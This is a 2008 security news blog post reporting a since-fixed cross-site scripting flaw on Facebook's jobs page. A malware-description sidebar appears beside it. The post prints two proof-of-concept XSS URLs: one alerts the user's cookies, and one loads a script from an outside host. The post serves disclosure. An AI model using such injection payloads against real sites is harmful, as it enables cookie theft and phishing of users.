New Cross-Site Scripting Vulnerability Found On Facebook

May 23rd, 2008

New Cross-Site Scripting Vulnerability Found On Facebook

According to XSSed, Facebook is vulnerable to a cross site scripting flaw that leaves its users at risk from scripting attacks and logins phishing. The security blog has posted a proof of concept demo of a flaw on the social networking website that could leave surfers vulnerable to malware. Attackers can also trick users into handing over their credentials through fake logins served up from third party sites.

Here is a harmless proof of concept, shown at XSSed:

http://www.facebook.com/jobs/position.php?st=
%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe
%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.facebook.com/jobs/position.php?st=
%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E

Security watchers say that malware authors, spammers and scammers are paying increasing attention to social networking websites. This recent Facebook vulnerability comes shortly after the cross-site scripting exposure on Paypal.com.

Additional warnings of this kind of vulnerability come as network security firm Sophos detected a 419 scam email on business-focused social networking site LinkedIn earlier this week.

At this moment the flaw is still open. Facebook has been already notified of the vulnerability.

Update (May 27): Facebook has fixed this vulnerability a couple of days ago.

Email, Bookmark or Share:

More on CyberInsecure:

Cross-Site Scripting Vulnerability On Paypal Could Be Used In Phishing Attacks

Another Cross-Site Scripting Vulnerability On eBay Domain Sites Allows Phishing

Hacked Obama Site Redirects Visitors to Clinton’s Site

XSS Worm At Justin.tv Affects 2525 Profiles

Vulnerabilities In Both Principal London Mayoral Election Candidates Websites

Posted in Vulnerabilities, XSS |

Print This Post

This entry was posted on Friday, May 23rd, 2008 at 12:30 pm and is filed under Vulnerabilities, XSS. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

If you found this information useful, consider linking to it from your own website.
Just copy and paste the code below into your website (Ctrl+C to copy)
It will look like this: New Cross-Site Scripting Vulnerability Found On Facebook

Comments with unsolicited links to other resources will be marked as spam. Please leave your real email, it wont be published.

Latest Virus Descriptions

not-a-virus:NetTool.Win32.Transmit.a 07 Oct 2008 11:59:00 +040
This is a potentially unwanted program (PUP). It is a Windows PE EXE file. It is 32768 bytes in size. It is packed using PECompact. The unpacked file is approximately 192KB in size.
Trojan-Downloader.JS.Agent.bxr 07 Oct 2008 11:56:00 +040
This Trojan downloads another malicious program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Visual Basic Script file. It is 1159 bytes in size.
Worm.Win32.AutoRun.bnb 07 Oct 2008 11:39:00 +040
This worm propagates by creating copies of itself on local disks and write-accessible network resources. It is a Windows PE EXE file. It is 46592 bytes in size. It is packed using UPX. The unpacked file is approximately 107MB in size. Installation The worm copies its executable file to the…
Trojan.Win32.ConnectionServices.e 07 Oct 2008 11:35:00 +040
This Trojan has a malicious payload. It is a Windows PE EXE file. It is 319488 bytes in size.
Trojan.Win32.Agent.bve 06 Oct 2008 13:09:00 +040
This Trojan has a malicious payload. The program itself is a Windows PE DLL file. It is approximately 100KB in size. Installation The Trojan copies its executable file to the Windows system directory: %System%\mstmdm.dll In order to ensure that the Trojan is launched automatically each time the…
Trojan-Downloader.JS.Psyme.ali 06 Oct 2008 12:50:00 +040
This Trojan downloads another program via the Internet without the user’s knowledge or consent. It is a Visual Basic Script file. It is 10881 bytes in size.
Email-Worm.Win32.Joleee.ak 06 Oct 2008 12:44:00 +040
This malicious program is a Windows PE EXE file. It is 45056 bytes in size. Installation When launched, the worm copies its executable file to the Windows root directory: [%WinDir%\services.exe In order to ensure that the worm is launched automatically each time the system is booted, it adds a…
Backdoor.Win32.Delf.duc 03 Oct 2008 18:24:00 +040
This malicious program is a Trojan. It is a Windows PE EXE file. It is 447488 bytes in size.
Trojan-Downloader.Win32.Agent.qlh 03 Oct 2008 18:21:00 +040
This Trojan downloads another program and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. It is 49152 bytes in size. It is written in C++.
Exploit.JS.Agent.sc 03 Oct 2008 18:19:00 +040
This malicious program is an exploit which uses a vulnerability in the RealAudioObjects.RealAudio Active X control to download other malicious programs via the Internet and launch them on the victim machine. The program is an HTML page which contains Java Script scenarios. It is 5294 bytes in…

CyberInsecure.com

New Cross-Site Scripting Vulnerability Found On Facebook

Leave a Reply

Categories

Archives

Links

Internet Threat Level

Recent Enteries

Vendor Security Alerts

Subscribe

Members

Latest Virus Descriptions